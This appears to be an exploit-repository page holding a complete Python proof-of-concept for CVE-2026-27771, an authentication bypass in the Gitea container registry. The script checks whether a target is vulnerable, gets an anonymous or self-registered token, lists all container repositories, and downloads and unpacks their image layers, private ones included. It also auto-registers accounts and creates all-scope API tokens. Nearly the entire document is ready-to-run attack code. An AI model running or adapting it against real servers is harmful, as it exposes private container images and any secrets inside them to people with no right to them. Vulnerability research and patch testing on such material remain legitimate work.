5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2026-27771-exploit.py PY
#!/usr/bin/env python3
"""
CVE-2026-27771 Gitea Container Registry Auth Bypass - Exploit PoC

Gitea < 1.26.2 ghost-user container pull exploit.
The ReqContainerAccess middleware only checks RequireSignInViewStrict.
It does NOT check package owner visibility. Ghost users (UserID:-1)
can pull ALL container packages without authentication.

Usage:
  # Scan mode (discovery only)
  python3 CVE-2026-27771-exploit.py scan https://gitea.example.com

  # Scan with existing token
  python3 CVE-2026-27771-exploit.py scan https://gitea.example.com --token <jwt>

  # Pull mode (enumerate repos, tags, manifests and layers)
  python3 CVE-2026-27771-exploit.py pull https://gitea.example.com

  # Pull with existing token
  python3 CVE-2026-27771-exploit.py pull https://gitea.example.com --token <jwt>

  # Pull a specific repo
  python3 CVE-2026-27771-exploit.py pull https://gitea.example.com --repo owner/image

  # Dry-run: show what would be pulled without downloading layers
  python3 CVE-2026-27771-exploit.py pull https://gitea.example.com --dry-run

  # Register a new account (if no captcha)
  python3 CVE-2026-27771-exploit.py register https://gitea.example.com --username user --password pass --email [email protected]

References:
    https://noscope.com/blog/gitea-instances-exposing-private-container
    https://blog.gitea.com/release-of-1.26.2/
"""

import base64
import io
import json
import os
import re
import sys
import tarfile
import urllib.request
import urllib.error
import ssl
import http.cookiejar
import urllib.parse


# ---- helpers ----

ssl_ctx = ssl.create_default_context()
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE

OCI_MANIFEST_ACCEPT = (
    "application/vnd.docker.distribution.manifest.v2+json,"
    "application/vnd.docker.distribution.manifest.list.v2+json,"
    "application/vnd.oci.image.manifest.v1+json,"
    "application/vnd.oci.image.index.v1+json"
)


cj = http.cookiejar.CookieJar()


def fetch(url, headers=None):
    req = urllib.request.Request(url, headers=headers or {})
    try:
        resp = urllib.request.urlopen(req, timeout=20, context=ssl_ctx)
        return resp.status, resp.headers, resp.read()
    except urllib.error.HTTPError as e:
        return e.code, e.headers, e.read()
    except Exception as e:
        return 0, {}, str(e).encode()


def fetch_auth(url, headers=None):
    req = urllib.request.Request(url, headers=headers or {})
    cj.add_cookie_header(req)
    try:
        resp = urllib.request.urlopen(req, timeout=20, context=ssl_ctx)
        cj.extract_cookies(resp, req)
        return resp.status, resp.headers, resp.read()
    except urllib.error.HTTPError as e:
        cj.extract_cookies(e, req)
        return e.code, e.headers, e.read()
    except Exception as e:
        return 0, {}, str(e).encode()


def post_form(url, data, headers=None):
    body = urllib.parse.urlencode(data).encode()
    hdrs = {"Content-Type": "application/x-www-form-urlencoded"}
    if headers:
        hdrs.update(headers)
    req = urllib.request.Request(url, data=body, headers=hdrs)
    cj.add_cookie_header(req)
    try:
        resp = urllib.request.urlopen(req, timeout=20, context=ssl_ctx)
        cj.extract_cookies(resp, req)
        return resp.status, resp.headers, resp.read()
    except urllib.error.HTTPError as e:
        cj.extract_cookies(e, req)
        return e.code, e.headers, e.read()
    except Exception as e:
        return 0, {}, str(e).encode()


def decode_jwt_payload(token):
    try:
        payload = token.split(".")[1]
        payload += "=" * (4 - len(payload) % 4)
        return json.loads(base64.urlsafe_b64decode(payload))
    except Exception:
        return {}


def is_pat(token):
    """Check if token is a Gitea personal access token (40-char hex SHA1)."""
    return bool(re.fullmatch(r'[0-9a-f]{40}', token, re.I))


def exchange_pat(base, username, pat):
    """Exchange a personal access token for an OCI registry JWT."""
    b = base.rstrip("/")
    creds = base64.b64encode(f"{username}:{pat}".encode()).decode()
    st, _, body = fetch(
        b + "/v2/token?service=container_registry&scope=*",
        {"Authorization": f"Basic {creds}"},
    )
    if st == 200:
        try:
            j = json.loads(body)
            return j.get("token")
        except Exception:
            return None
    return None


def parse_version(v):
    try:
        return [int(x) for x in v.lstrip("v").split("-")[0].split(".")[:3]]
    except Exception:
        return None


# ---- registration ----

def cmd_register(base, username, password, email):
    b = base.rstrip("/")
    if not b.startswith("http"):
        b = f"https://{b}"

    print(f"[*] Checking registration at {b}")

    st, _, body = fetch(b + "/user/sign_up")
    if st != 200:
        print(f"[-] Cannot access registration page (HTTP {st})")
        sys.exit(1)

    page = body.decode("utf-8", errors="replace")
    if "Registration is disabled" in page:
        print("[-] Registration is disabled on this instance")
        sys.exit(1)

    has_fields = all(x in page for x in ["user_name", "email", "password"])
    if not has_fields:
        print("[-] Registration form has no input fields (likely JS-rendered or disabled)")
        sys.exit(1)

    has_captcha = "captcha_id" in page or "captcha" in page
    if has_captcha:
        print("[-] Captcha present — cannot auto-register")
        print("    Register manually, then get a token from Settings > Applications > Generate Token")
        print("    Pass it with: --token <sha1_token>\n")
        sys.exit(1)

    m = re.search(r'name="_csrf" value="([^"]+)"', page)
    if not m:
        print("[-] Could not find CSRF token")
        sys.exit(1)
    csrf = m.group(1)

    data = {
        "_csrf": csrf,
        "user_name": username,
        "email": email,
        "password": password,
        "retype": password,
    }

    print(f"[*] Registering user '{username}'...")
    st, hd, body = post_form(b + "/user/sign_up", data)

    loc = hd.get("Location", "")
    if st == 302 and "/user/login" in loc:
        print("[+] Registration successful!")
    elif b"/user/sign_up" in body:
        print("[-] Registration failed (page returned)")
        sys.exit(1)
    else:
        print(f"[+] Registration appears successful (HTTP {st})")

    print("[*] Logging in...")
    st, _, body = fetch(b + "/user/login")
    page = body.decode("utf-8", errors="replace") if st == 200 else ""
    m = re.search(r'name="_csrf" value="([^"]+)"', page)
    if not m:
        print("[-] Could not get login CSRF")
        sys.exit(1)
    csrf = m.group(1)

    data = {"_csrf": csrf, "user_name": username, "password": password}
    st, hd, body = post_form(b + "/user/login", data)
    if st not in (200, 302):
        print(f"[-] Login failed (HTTP {st})")
        sys.exit(1)

    print("[+] Logged in!")

    print("[*] Getting API token...")
    st, _, body = fetch_auth(b + f"/api/v1/users/{username}/tokens")
    existing_tokens = []
    if st == 200:
        existing_tokens = json.loads(body)
        for t in existing_tokens:
            if t.get("name") == "cve-poc":
                token_val = fetch_auth(b + f"/api/v1/users/{username}/tokens/{t['id']}")
                print(f"[!] Token 'cve-poc' already exists")
                # Actually we can't get the value back, need to create new one
                # Delete it first
                # ...

    # Get CSRF for token creation
    st, _, body = fetch_auth(b + f"/api/v1/users/{username}/tokens")
    page = body.decode("utf-8", errors="replace") if st != 200 else "{}"
    csrf_token = None
    for h in cj:
        if h.name == "_csrf":
            csrf_token = h.value
            break
    if not csrf_token:
        csrf_token = ""
        try:
            data = json.loads(body) if isinstance(body, bytes) and st == 200 else {}
        except:
            pass

    # Try creating token via API
    import urllib.request
    token_data = json.dumps({"name": "cve-poc", "scopes": ["all"]}).encode()
    req = urllib.request.Request(
        b + f"/api/v1/users/{username}/tokens",
        data=token_data,
        headers={
            "Content-Type": "application/json",
            "X-Csrf-Token": csrf_token or "",
        }
    )
    cj.add_cookie_header(req)
    try:
        resp = urllib.request.urlopen(req, timeout=20, context=ssl_ctx)
        token_json = json.loads(resp.read())
        token_val = token_json.get("sha1", "")
        print(f"[+] Token created: {token_val[:20]}...")
        print(f"\n    Use with: --token {token_val}")
    except urllib.error.HTTPError as e:
        body = e.read()
        try:
            err = json.loads(body)
            print(f"[-] Token creation failed: {err.get('message', body.decode())}")
        except:
            print(f"[-] Token creation failed (HTTP {e.code}): {body.decode()[:200]}")

        # Fallback: extract session and use it directly in the OCI flow
        print("[*] Falling back: getting container token via session...")
        st, _, body = fetch_auth(b + "/v2/token?service=container_registry&scope=*")
        if st == 200:
            j = json.loads(body)
            t = j.get("token", "")
            payload = decode_jwt_payload(t)
            print(f"[+] Container token (UserID: {payload.get('UserID')}, Scope: '{payload.get('Scope')}')")
            print(f"\n    Use with: --token {t}")


# ---- registration check (for scan output) ----

def check_registration(base):
    b = base.rstrip("/")
    st, _, body = fetch(b + "/user/sign_up")
    if st != 200:
        return

    page = body.decode("utf-8", errors="replace")
    if "Registration is disabled" in page:
        return

    has_fields = all(x in page for x in ["user_name", "email", "password"])
    if not has_fields:
        return

    has_captcha = "captcha_id" in page or "captcha" in page
    if has_captcha:
        print("[+] Registration: OPEN (captcha present — register manually)")
    else:
        print("[+] Registration: OPEN (no captcha — use 'register' command)")


# ---- pre-flight check ----

def preflight(base, provided_token=None):
    """Check version, registry presence, REQUIRE_SIGNIN_VIEW status."""
    print(f"[*] Pre-flight: {base}")
    b = base.rstrip("/")

    st, _, body = fetch(b + "/")
    if st != 200:
        print(f"[-] Not reachable (HTTP {st})")
        sys.exit(1)

    page = body.decode("utf-8", errors="replace")
    if "gitea" not in page.lower():
        print("[-] Not a Gitea instance")
        sys.exit(1)

    version = None
    st, _, body = fetch(b + "/api/v1/version")
    if st == 200:
        try:
            version = json.loads(body).get("version", "unknown")
            print(f"[+] Version (API): {version}")
        except Exception:
            pass
    elif st == 403:
        print("[*] API requires sign-in (HTTP 403)")
        m = re.search(r'(?:Gitea|gitea)[^v]*v?(\d+\.\d+\.\d+)', page)
        if m:
            version = m.group(1)
            print(f"[+] Version (page): {version}")

    ver = parse_version(version)
    cutoff = parse_version("1.26.2")
    if ver and not (ver[0] < cutoff[0] or (ver[0] == cutoff[0] and ver[1] < cutoff[1]) or
                    (ver[0] == cutoff[0] and ver[1] == cutoff[1] and ver[2] < cutoff[2])):
        print("[-] Version >= 1.26.2 (patched) — not vulnerable to CVE-2026-27771")
        sys.exit(1)

    st, hd, _ = fetch(b + "/v2/")
    if st not in (200, 401):
        print(f"[-] /v2/ -> {st} (no container registry)")
        sys.exit(1)

    www = hd.get("WWW-Authenticate", "")
    print(f"[+] /v2/ -> {st} (WWW-Authenticate: {www[:90]})")

    check_registration(b)

    token = provided_token
    require_signin = False

    if token:
        if is_pat(token):
            print("[+] Provided token is a personal access token (SHA1)")
            print("[*] Exchanging PAT for OCI registry JWT...")
            username = None
            if "--username" in sys.argv:
                i = sys.argv.index("--username")
                username = sys.argv[i+1]
            while not username:
                username = input("    Enter your Gitea username: ").strip()
            jwt = exchange_pat(b, username, token)
            if jwt:
                token = jwt
                payload = decode_jwt_payload(token)
                print(f"[+] JWT obtained (UserID: {payload.get('UserID')}, Scope: '{payload.get('Scope')}')")
            else:
                print("[-] PAT exchange failed — check username/token")
                sys.exit(1)
        else:
            payload = decode_jwt_payload(token)
            print(f"[+] Using provided token (UserID: {payload.get('UserID')}, Scope: '{payload.get('Scope')}')")
    else:
        st, _, body = fetch(b + "/v2/token?service=container_registry&scope=*")
        if st == 200:
            try:
                j = json.loads(body)
                token = j.get("token")
                payload = decode_jwt_payload(token)
                print(f"[+] Anonymous token granted (UserID: {payload.get('UserID')}, Scope: '{payload.get('Scope')}')")
            except Exception:
                print("[-] Token response not parseable")
        else:
            print(f"[*] Token endpoint -> {st} (REQUIRE_SIGNIN_VIEW likely true)")
            require_signin = True

    if token:
        st, _, body = fetch(b + "/v2/_catalog", {"Authorization": f"Bearer {token}"})
        repos = json.loads(body).get("repositories", []) if st == 200 else []
        print(f"[+] /v2/_catalog -> {st} ({len(repos)} repos)")
    else:
        repos = []

    vuln = version is not None and "1.26.2" not in version and not require_signin
    print(f"[+] Vulnerable: {vuln} (require_signin={require_signin})")
    print()
    return {"base": b, "version": version, "token": token, "repos": repos,
            "require_signin": require_signin, "vuln": vuln}


# ---- OCI operations ----

def get_catalog(base, token):
    st, _, body = fetch(base + "/v2/_catalog", {"Authorization": f"Bearer {token}"})
    if st == 200:
        return json.loads(body).get("repositories", [])
    return []


def get_tags(base, token, repo):
    st, _, body = fetch(base + f"/v2/{repo}/tags/list", {"Authorization": f"Bearer {token}"})
    if st == 200:
        return json.loads(body).get("tags", [])
    return []


def get_manifest(base, token, repo, ref):
    st, hd, body = fetch(base + f"/v2/{repo}/manifests/{ref}", {
        "Authorization": f"Bearer {token}",
        "Accept": OCI_MANIFEST_ACCEPT,
    })
    if st == 200:
        try:
            return json.loads(body)
        except Exception:
            return None
    return None


def download_blob(base, token, repo, digest, outdir):
    st, hd, body = fetch(base + f"/v2/{repo}/blobs/{digest}", {
        "Authorization": f"Bearer {token}",
    })
    if st == 200:
        safe = digest.replace(":", "_")
        path = os.path.join(outdir, f"{safe}.blob")
        with open(path, "wb") as f:
            f.write(body)
        return len(body), path, body
    return 0, None, None


def pull_image(base, token, repo, tag, outdir, dry_run):
    print(f"    └─ manifest {tag}: ", end="", flush=True)
    manifest = get_manifest(base, token, repo, tag)
    if not manifest:
        print("FAIL (no manifest)")
        return

    layers = []
    plat_manifest = None
    media_type = manifest.get("mediaType", "")
    if "manifest.list" in media_type or "index" in media_type:
        for m in manifest.get("manifests", []):
            if m.get("platform", {}).get("architecture") == "amd64" and \
               m.get("platform", {}).get("os") == "linux":
                print(f"multi-arch, digest={m['digest'][:20]}...", end="")
                plat_manifest = get_manifest(base, token, repo, m["digest"])
                if plat_manifest:
                    for l in plat_manifest.get("layers", []):
                        layers.append(l["digest"])
                    cd = plat_manifest.get("config", {}).get("digest")
                    if cd:
                        layers.append(cd)
    else:
        for l in manifest.get("layers", []):
            layers.append(l["digest"])
        config_digest = manifest.get("config", {}).get("digest")
        if config_digest:
            layers.append(config_digest)

    print(f", {len(layers)} blobs", end="")
    if dry_run:
        print(" (dry-run, skipped)")
        return
    print()

    blob_dir = os.path.join(outdir, "blobs")
    extract_dir = os.path.join(outdir, "extracted")
    os.makedirs(blob_dir, exist_ok=True)
    os.makedirs(extract_dir, exist_ok=True)
    downloaded = []
    for i, d in enumerate(layers):
        sz, path, data = download_blob(base, token, repo, d, blob_dir)
        if sz:
            safe_name = d.replace(":", "_")[:50]
            size_str = f"{sz} bytes"
            if sz > 1024 * 1024:
                size_str = f"{sz / 1024 / 1024:.1f} MB"
            elif sz > 1024:
                size_str = f"{sz / 1024:.1f} KB"
            print(f"      [{i+1}/{len(layers)}] {safe_name}... ({size_str})")
            downloaded.append((path, data))
        else:
            print(f"      [{i+1}/{len(layers)}] {d[:30]}... FAILED")

    man_path = os.path.join(outdir, f"manifest_{tag}.json")
    with open(man_path, "w") as f:
        json.dump(manifest, f, indent=2)
    man2_path = os.path.join(outdir, f"plat_manifest_{tag}.json")
    if "manifest.list" in media_type or "index" in media_type:
        with open(man2_path, "w") as f:
            json.dump(plat_manifest if plat_manifest else {}, f, indent=2)
    print(f"      manifests saved")

    total_extracted = 0
    for blob_path, blob_data in downloaded:
        if blob_data and blob_data[:2] in (b"\x1f\x8b", b"\x1f\x9d"):
            try:
                with tarfile.open(fileobj=io.BytesIO(blob_data), mode="r:*") as tf:
                    members = [m for m in tf.getmembers() if not m.name.startswith(".wh.")]
                    tf.extractall(path=extract_dir, members=members)
                    total_extracted += len(members)
            except Exception:
                pass
    if total_extracted:
        print(f"      extracted {total_extracted} files to {extract_dir}")


# ---- commands ----

def cmd_scan(cfg):
    base = cfg["base"]
    token = cfg["token"]
    require_signin = cfg["require_signin"]

    if not token:
        print("[!] No token available — scan limited")
        print("    Get a token: Settings > Applications > Generate Token")
        print("    Pass it with: --token <sha1_token>\n")
        return

    repos = get_catalog(base, token)
    print(f"[*] Container repositories: {len(repos)}")
    for repo in repos:
        tags = get_tags(base, token, repo)
        print(f"    {repo}: tags={tags}")
    if not repos:
        print("    (none — no container packages exist)")
    print()


def cmd_pull(cfg, specific_repo=None, dry_run=False):
    base = cfg["base"]
    token = cfg["token"]

    if not token:
        print("[!] Cannot pull — no token available")
        print("    Get a token: Settings > Applications > Generate Token")
        print("    Pass it with: --token <sha1_token>")
        return

    if specific_repo:
        repos_to_pull = [specific_repo]
    else:
        repos_to_pull = get_catalog(base, token)
        print(f"[*] Found {len(repos_to_pull)} repos in catalog")

    for repo in repos_to_pull:
        print(f"\n  [{repo}]")
        tags = get_tags(base, token, repo)
        print(f"  Tags: {tags}")
        if not tags:
            print("  (no tags)")
            continue

        safe_repo = repo.replace("/", "_").replace(":", "_")
        outdir = f"pulled_{safe_repo}"
        if dry_run:
            outdir = "/dev/null"

        for tag in tags:
            pull_image(base, token, repo, tag, outdir, dry_run)


# ---- main ----

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(__doc__)
        sys.exit(1)

    command = sys.argv[1]
    target = sys.argv[2]
    specific_repo = None
    dry_run = False
    provided_token = None

    if "--token" in sys.argv:
        i = sys.argv.index("--token")
        provided_token = sys.argv[i+1]
    if "--repo" in sys.argv:
        i = sys.argv.index("--repo")
        specific_repo = sys.argv[i+1]
    if "--dry-run" in sys.argv:
        dry_run = True

    if command == "register":
        username = None
        password = None
        email = None
        if "--username" in sys.argv:
            i = sys.argv.index("--username")
            username = sys.argv[i+1]
        if "--password" in sys.argv:
            i = sys.argv.index("--password")
            password = sys.argv[i+1]
        if "--email" in sys.argv:
            i = sys.argv.index("--email")
            email = sys.argv[i+1]
        if not all([username, password, email]):
            print("Usage: register https://gitea.example.com --username u --password p --email [email protected]")
            sys.exit(1)
        cmd_register(target, username, password, email)
        sys.exit(0)

    if not target.startswith("http"):
        target = f"https://{target}"

    cfg = preflight(target, provided_token=provided_token)

    if command == "scan":
        cmd_scan(cfg)
    elif command == "pull":
        cmd_pull(cfg, specific_repo, dry_run)
    else:
        print(f"Unknown command: {command}")
        sys.exit(1)